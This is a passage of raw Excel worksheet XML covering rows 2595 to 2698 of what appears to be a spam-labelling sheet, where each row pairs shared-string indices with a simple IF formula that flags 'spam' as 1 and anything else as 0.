    <row r="2595" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2595" t="s">
        <v>7778</v>
      </c>
      <c r="B2595" t="s">
        <v>5294</v>
      </c>
      <c r="C2595" s="1">
        <f>IF(B2595="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2596" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2596" t="s">
        <v>7779</v>
      </c>
      <c r="B2596" t="s">
        <v>5294</v>
      </c>
      <c r="C2596" s="1">
        <f>IF(B2596="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2597" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2597" t="s">
        <v>6154</v>
      </c>
      <c r="B2597" t="s">
        <v>5297</v>
      </c>
      <c r="C2597" s="1">
        <f>IF(B2597="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2598" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2598" t="s">
        <v>7780</v>
      </c>
      <c r="B2598" t="s">
        <v>5294</v>
      </c>
      <c r="C2598" s="1">
        <f>IF(B2598="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2599" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2599" t="s">
        <v>7781</v>
      </c>
      <c r="B2599" t="s">
        <v>5294</v>
      </c>
      <c r="C2599" s="1">
        <f>IF(B2599="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2600" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2600" t="s">
        <v>7782</v>
      </c>
      <c r="B2600" t="s">
        <v>5294</v>
      </c>
      <c r="C2600" s="1">
        <f>IF(B2600="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2601" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2601" t="s">
        <v>7783</v>
      </c>
      <c r="B2601" t="s">
        <v>5294</v>
      </c>
      <c r="C2601" s="1">
        <f>IF(B2601="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2602" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2602" t="s">
        <v>7784</v>
      </c>
      <c r="B2602" t="s">
        <v>5294</v>
      </c>
      <c r="C2602" s="1">
        <f>IF(B2602="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2603" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2603" t="s">
        <v>7785</v>
      </c>
      <c r="B2603" t="s">
        <v>5294</v>
      </c>
      <c r="C2603" s="1">
        <f>IF(B2603="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2604" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2604" t="s">
        <v>7786</v>
      </c>
      <c r="B2604" t="s">
        <v>5294</v>
      </c>
      <c r="C2604" s="1">
        <f>IF(B2604="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2605" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2605" t="s">
        <v>7787</v>
      </c>
      <c r="B2605" t="s">
        <v>5294</v>
      </c>
      <c r="C2605" s="1">
        <f>IF(B2605="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2606" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2606" t="s">
        <v>7788</v>
      </c>
      <c r="B2606" t="s">
        <v>5294</v>
      </c>
      <c r="C2606" s="1">
        <f>IF(B2606="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2607" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2607" t="s">
        <v>7789</v>
      </c>
      <c r="B2607" t="s">
        <v>5294</v>
      </c>
      <c r="C2607" s="1">
        <f>IF(B2607="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2608" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2608" t="s">
        <v>7790</v>
      </c>
      <c r="B2608" t="s">
        <v>5294</v>
      </c>
      <c r="C2608" s="1">
        <f>IF(B2608="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2609" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2609" t="s">
        <v>7791</v>
      </c>
      <c r="B2609" t="s">
        <v>5294</v>
      </c>
      <c r="C2609" s="1">
        <f>IF(B2609="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2610" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2610" t="s">
        <v>7792</v>
      </c>
      <c r="B2610" t="s">
        <v>5294</v>
      </c>
      <c r="C2610" s="1">
        <f>IF(B2610="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2611" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2611" t="s">
        <v>7793</v>
      </c>
      <c r="B2611" t="s">
        <v>5294</v>
      </c>
      <c r="C2611" s="1">
        <f>IF(B2611="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2612" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2612" t="s">
        <v>7784</v>
      </c>
      <c r="B2612" t="s">
        <v>5294</v>
      </c>
      <c r="C2612" s="1">
        <f>IF(B2612="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2613" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2613" t="s">
        <v>7794</v>
      </c>
      <c r="B2613" t="s">
        <v>5297</v>
      </c>
      <c r="C2613" s="1">
        <f>IF(B2613="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2614" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2614" t="s">
        <v>7795</v>
      </c>
      <c r="B2614" t="s">
        <v>5294</v>
      </c>
      <c r="C2614" s="1">
        <f>IF(B2614="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2615" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2615" t="s">
        <v>7796</v>
      </c>
      <c r="B2615" t="s">
        <v>5294</v>
      </c>
      <c r="C2615" s="1">
        <f>IF(B2615="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2616" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2616" t="s">
        <v>7797</v>
      </c>
      <c r="B2616" t="s">
        <v>5294</v>
      </c>
      <c r="C2616" s="1">
        <f>IF(B2616="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2617" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2617" t="s">
        <v>7798</v>
      </c>
      <c r="B2617" t="s">
        <v>5294</v>
      </c>
      <c r="C2617" s="1">
        <f>IF(B2617="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2618" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2618" t="s">
        <v>7799</v>
      </c>
      <c r="B2618" t="s">
        <v>5294</v>
      </c>
      <c r="C2618" s="1">
        <f>IF(B2618="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2619" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2619" t="s">
        <v>5590</v>
      </c>
      <c r="B2619" t="s">
        <v>5294</v>
      </c>
      <c r="C2619" s="1">
        <f>IF(B2619="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2620" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2620" t="s">
        <v>7800</v>
      </c>
      <c r="B2620" t="s">
        <v>5294</v>
      </c>
      <c r="C2620" s="1">
        <f>IF(B2620="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2621" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2621" t="s">
        <v>7801</v>
      </c>
      <c r="B2621" t="s">
        <v>5297</v>
      </c>
      <c r="C2621" s="1">
        <f>IF(B2621="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2622" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2622" t="s">
        <v>7802</v>
      </c>
      <c r="B2622" t="s">
        <v>5294</v>
      </c>
      <c r="C2622" s="1">
        <f>IF(B2622="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2623" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2623" t="s">
        <v>7803</v>
      </c>
      <c r="B2623" t="s">
        <v>5294</v>
      </c>
      <c r="C2623" s="1">
        <f>IF(B2623="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2624" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2624" t="s">
        <v>7804</v>
      </c>
      <c r="B2624" t="s">
        <v>5294</v>
      </c>
      <c r="C2624" s="1">
        <f>IF(B2624="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2625" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2625" t="s">
        <v>7805</v>
      </c>
      <c r="B2625" t="s">
        <v>5294</v>
      </c>
      <c r="C2625" s="1">
        <f>IF(B2625="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2626" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2626" t="s">
        <v>7806</v>
      </c>
      <c r="B2626" t="s">
        <v>5294</v>
      </c>
      <c r="C2626" s="1">
        <f>IF(B2626="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2627" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2627" t="s">
        <v>7807</v>
      </c>
      <c r="B2627" t="s">
        <v>5297</v>
      </c>
      <c r="C2627" s="1">
        <f>IF(B2627="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2628" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2628" t="s">
        <v>7808</v>
      </c>
      <c r="B2628" t="s">
        <v>5294</v>
      </c>
      <c r="C2628" s="1">
        <f>IF(B2628="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2629" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2629" t="s">
        <v>7809</v>
      </c>
      <c r="B2629" t="s">
        <v>5294</v>
      </c>
      <c r="C2629" s="1">
        <f>IF(B2629="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2630" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2630" t="s">
        <v>7810</v>
      </c>
      <c r="B2630" t="s">
        <v>5294</v>
      </c>
      <c r="C2630" s="1">
        <f>IF(B2630="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2631" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2631" t="s">
        <v>7811</v>
      </c>
      <c r="B2631" t="s">
        <v>5294</v>
      </c>
      <c r="C2631" s="1">
        <f>IF(B2631="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2632" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2632" t="s">
        <v>7812</v>
      </c>
      <c r="B2632" t="s">
        <v>5294</v>
      </c>
      <c r="C2632" s="1">
        <f>IF(B2632="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2633" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2633" t="s">
        <v>7813</v>
      </c>
      <c r="B2633" t="s">
        <v>5297</v>
      </c>
      <c r="C2633" s="1">
        <f>IF(B2633="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2634" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2634" t="s">
        <v>7814</v>
      </c>
      <c r="B2634" t="s">
        <v>5294</v>
      </c>
      <c r="C2634" s="1">
        <f>IF(B2634="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2635" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2635" t="s">
        <v>7815</v>
      </c>
      <c r="B2635" t="s">
        <v>5294</v>
      </c>
      <c r="C2635" s="1">
        <f>IF(B2635="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2636" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2636" t="s">
        <v>7816</v>
      </c>
      <c r="B2636" t="s">
        <v>5294</v>
      </c>
      <c r="C2636" s="1">
        <f>IF(B2636="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2637" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2637" t="s">
        <v>7817</v>
      </c>
      <c r="B2637" t="s">
        <v>5294</v>
      </c>
      <c r="C2637" s="1">
        <f>IF(B2637="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2638" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2638" t="s">
        <v>7818</v>
      </c>
      <c r="B2638" t="s">
        <v>5294</v>
      </c>
      <c r="C2638" s="1">
        <f>IF(B2638="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2639" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2639" t="s">
        <v>7819</v>
      </c>
      <c r="B2639" t="s">
        <v>5294</v>
      </c>
      <c r="C2639" s="1">
        <f>IF(B2639="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2640" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2640" t="s">
        <v>7820</v>
      </c>
      <c r="B2640" t="s">
        <v>5294</v>
      </c>
      <c r="C2640" s="1">
        <f>IF(B2640="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2641" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2641" t="s">
        <v>7821</v>
      </c>
      <c r="B2641" t="s">
        <v>5294</v>
      </c>
      <c r="C2641" s="1">
        <f>IF(B2641="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2642" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2642" t="s">
        <v>7822</v>
      </c>
      <c r="B2642" t="s">
        <v>5294</v>
      </c>
      <c r="C2642" s="1">
        <f>IF(B2642="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2643" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2643" t="s">
        <v>7823</v>
      </c>
      <c r="B2643" t="s">
        <v>5297</v>
      </c>
      <c r="C2643" s="1">
        <f>IF(B2643="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2644" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2644" t="s">
        <v>7824</v>
      </c>
      <c r="B2644" t="s">
        <v>5294</v>
      </c>
      <c r="C2644" s="1">
        <f>IF(B2644="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2645" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2645" t="s">
        <v>5473</v>
      </c>
      <c r="B2645" t="s">
        <v>5294</v>
      </c>
      <c r="C2645" s="1">
        <f>IF(B2645="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2646" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2646" t="s">
        <v>7825</v>
      </c>
      <c r="B2646" t="s">
        <v>5294</v>
      </c>
      <c r="C2646" s="1">
        <f>IF(B2646="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2647" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2647" t="s">
        <v>5376</v>
      </c>
      <c r="B2647" t="s">
        <v>5294</v>
      </c>
      <c r="C2647" s="1">
        <f>IF(B2647="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2648" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2648" t="s">
        <v>7826</v>
      </c>
      <c r="B2648" t="s">
        <v>5294</v>
      </c>
      <c r="C2648" s="1">
        <f>IF(B2648="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2649" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2649" t="s">
        <v>7827</v>
      </c>
      <c r="B2649" t="s">
        <v>5294</v>
      </c>
      <c r="C2649" s="1">
        <f>IF(B2649="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2650" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2650" t="s">
        <v>7828</v>
      </c>
      <c r="B2650" t="s">
        <v>5294</v>
      </c>
      <c r="C2650" s="1">
        <f>IF(B2650="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2651" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2651" t="s">
        <v>7829</v>
      </c>
      <c r="B2651" t="s">
        <v>5294</v>
      </c>
      <c r="C2651" s="1">
        <f>IF(B2651="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2652" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2652" t="s">
        <v>7830</v>
      </c>
      <c r="B2652" t="s">
        <v>5294</v>
      </c>
      <c r="C2652" s="1">
        <f>IF(B2652="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2653" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2653" t="s">
        <v>7831</v>
      </c>
      <c r="B2653" t="s">
        <v>5294</v>
      </c>
      <c r="C2653" s="1">
        <f>IF(B2653="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2654" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2654" t="s">
        <v>7832</v>
      </c>
      <c r="B2654" t="s">
        <v>5294</v>
      </c>
      <c r="C2654" s="1">
        <f>IF(B2654="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2655" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2655" t="s">
        <v>7833</v>
      </c>
      <c r="B2655" t="s">
        <v>5294</v>
      </c>
      <c r="C2655" s="1">
        <f>IF(B2655="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2656" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2656" t="s">
        <v>7834</v>
      </c>
      <c r="B2656" t="s">
        <v>5294</v>
      </c>
      <c r="C2656" s="1">
        <f>IF(B2656="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2657" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2657" t="s">
        <v>7835</v>
      </c>
      <c r="B2657" t="s">
        <v>5294</v>
      </c>
      <c r="C2657" s="1">
        <f>IF(B2657="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2658" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2658" t="s">
        <v>7836</v>
      </c>
      <c r="B2658" t="s">
        <v>5294</v>
      </c>
      <c r="C2658" s="1">
        <f>IF(B2658="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2659" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2659" t="s">
        <v>7837</v>
      </c>
      <c r="B2659" t="s">
        <v>5294</v>
      </c>
      <c r="C2659" s="1">
        <f>IF(B2659="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2660" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2660" t="s">
        <v>7838</v>
      </c>
      <c r="B2660" t="s">
        <v>5294</v>
      </c>
      <c r="C2660" s="1">
        <f>IF(B2660="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2661" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2661" t="s">
        <v>6531</v>
      </c>
      <c r="B2661" t="s">
        <v>5294</v>
      </c>
      <c r="C2661" s="1">
        <f>IF(B2661="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2662" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2662" t="s">
        <v>7839</v>
      </c>
      <c r="B2662" t="s">
        <v>5294</v>
      </c>
      <c r="C2662" s="1">
        <f>IF(B2662="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2663" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2663" t="s">
        <v>7840</v>
      </c>
      <c r="B2663" t="s">
        <v>5294</v>
      </c>
      <c r="C2663" s="1">
        <f>IF(B2663="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2664" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2664" t="s">
        <v>7841</v>
      </c>
      <c r="B2664" t="s">
        <v>5297</v>
      </c>
      <c r="C2664" s="1">
        <f>IF(B2664="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2665" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2665" t="s">
        <v>7842</v>
      </c>
      <c r="B2665" t="s">
        <v>5297</v>
      </c>
      <c r="C2665" s="1">
        <f>IF(B2665="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2666" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2666" t="s">
        <v>7843</v>
      </c>
      <c r="B2666" t="s">
        <v>5294</v>
      </c>
      <c r="C2666" s="1">
        <f>IF(B2666="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2667" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2667" t="s">
        <v>7844</v>
      </c>
      <c r="B2667" t="s">
        <v>5294</v>
      </c>
      <c r="C2667" s="1">
        <f>IF(B2667="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2668" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2668" t="s">
        <v>7845</v>
      </c>
      <c r="B2668" t="s">
        <v>5294</v>
      </c>
      <c r="C2668" s="1">
        <f>IF(B2668="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2669" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2669" t="s">
        <v>7846</v>
      </c>
      <c r="B2669" t="s">
        <v>5294</v>
      </c>
      <c r="C2669" s="1">
        <f>IF(B2669="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2670" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2670" t="s">
        <v>7847</v>
      </c>
      <c r="B2670" t="s">
        <v>5297</v>
      </c>
      <c r="C2670" s="1">
        <f>IF(B2670="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2671" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2671" t="s">
        <v>7848</v>
      </c>
      <c r="B2671" t="s">
        <v>5297</v>
      </c>
      <c r="C2671" s="1">
        <f>IF(B2671="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2672" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2672" t="s">
        <v>7849</v>
      </c>
      <c r="B2672" t="s">
        <v>5294</v>
      </c>
      <c r="C2672" s="1">
        <f>IF(B2672="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2673" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2673" t="s">
        <v>7850</v>
      </c>
      <c r="B2673" t="s">
        <v>5294</v>
      </c>
      <c r="C2673" s="1">
        <f>IF(B2673="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2674" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2674" t="s">
        <v>7851</v>
      </c>
      <c r="B2674" t="s">
        <v>5294</v>
      </c>
      <c r="C2674" s="1">
        <f>IF(B2674="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2675" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2675" t="s">
        <v>7852</v>
      </c>
      <c r="B2675" t="s">
        <v>5294</v>
      </c>
      <c r="C2675" s="1">
        <f>IF(B2675="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2676" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2676" t="s">
        <v>7853</v>
      </c>
      <c r="B2676" t="s">
        <v>5294</v>
      </c>
      <c r="C2676" s="1">
        <f>IF(B2676="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2677" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2677" t="s">
        <v>7854</v>
      </c>
      <c r="B2677" t="s">
        <v>5294</v>
      </c>
      <c r="C2677" s="1">
        <f>IF(B2677="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2678" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2678" t="s">
        <v>7855</v>
      </c>
      <c r="B2678" t="s">
        <v>5294</v>
      </c>
      <c r="C2678" s="1">
        <f>IF(B2678="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2679" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2679" t="s">
        <v>7856</v>
      </c>
      <c r="B2679" t="s">
        <v>5294</v>
      </c>
      <c r="C2679" s="1">
        <f>IF(B2679="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2680" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2680" t="s">
        <v>7857</v>
      </c>
      <c r="B2680" t="s">
        <v>5294</v>
      </c>
      <c r="C2680" s="1">
        <f>IF(B2680="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2681" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2681" t="s">
        <v>7858</v>
      </c>
      <c r="B2681" t="s">
        <v>5297</v>
      </c>
      <c r="C2681" s="1">
        <f>IF(B2681="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2682" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2682" t="s">
        <v>7604</v>
      </c>
      <c r="B2682" t="s">
        <v>5294</v>
      </c>
      <c r="C2682" s="1">
        <f>IF(B2682="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2683" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2683" t="s">
        <v>7859</v>
      </c>
      <c r="B2683" t="s">
        <v>5294</v>
      </c>
      <c r="C2683" s="1">
        <f>IF(B2683="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2684" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2684" t="s">
        <v>7860</v>
      </c>
      <c r="B2684" t="s">
        <v>5294</v>
      </c>
      <c r="C2684" s="1">
        <f>IF(B2684="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2685" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2685" t="s">
        <v>7861</v>
      </c>
      <c r="B2685" t="s">
        <v>5294</v>
      </c>
      <c r="C2685" s="1">
        <f>IF(B2685="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2686" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2686" t="s">
        <v>7862</v>
      </c>
      <c r="B2686" t="s">
        <v>5294</v>
      </c>
      <c r="C2686" s="1">
        <f>IF(B2686="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2687" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2687" t="s">
        <v>7863</v>
      </c>
      <c r="B2687" t="s">
        <v>5297</v>
      </c>
      <c r="C2687" s="1">
        <f>IF(B2687="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2688" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2688" t="s">
        <v>7864</v>
      </c>
      <c r="B2688" t="s">
        <v>5294</v>
      </c>
      <c r="C2688" s="1">
        <f>IF(B2688="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2689" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2689" t="s">
        <v>7785</v>
      </c>
      <c r="B2689" t="s">
        <v>5294</v>
      </c>
      <c r="C2689" s="1">
        <f>IF(B2689="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2690" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2690" t="s">
        <v>7865</v>
      </c>
      <c r="B2690" t="s">
        <v>5294</v>
      </c>
      <c r="C2690" s="1">
        <f>IF(B2690="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2691" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2691" t="s">
        <v>7866</v>
      </c>
      <c r="B2691" t="s">
        <v>5294</v>
      </c>
      <c r="C2691" s="1">
        <f>IF(B2691="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2692" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2692" t="s">
        <v>7867</v>
      </c>
      <c r="B2692" t="s">
        <v>5297</v>
      </c>
      <c r="C2692" s="1">
        <f>IF(B2692="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2693" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2693" t="s">
        <v>7868</v>
      </c>
      <c r="B2693" t="s">
        <v>5294</v>
      </c>
      <c r="C2693" s="1">
        <f>IF(B2693="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2694" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2694" t="s">
        <v>7869</v>
      </c>
      <c r="B2694" t="s">
        <v>5297</v>
      </c>
      <c r="C2694" s="1">
        <f>IF(B2694="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="2695" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2695" t="s">
        <v>7870</v>
      </c>
      <c r="B2695" t="s">
        <v>5294</v>
      </c>
      <c r="C2695" s="1">
        <f>IF(B2695="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2696" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2696" t="s">
        <v>7871</v>
      </c>
      <c r="B2696" t="s">
        <v>5294</v>
      </c>
      <c r="C2696" s="1">
        <f>IF(B2696="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2697" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2697" t="s">
        <v>7872</v>
      </c>
      <c r="B2697" t="s">
        <v>5294</v>
      </c>
      <c r="C2697" s="1">
        <f>IF(B2697="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="2698" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A2698" t="s">
        <v>7873</v>
      </c>
      <c r="B2698" t="s">
        <v>5294</v>
      </c>
      <c r="C2698" s="1">
        <f>IF(B2698="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
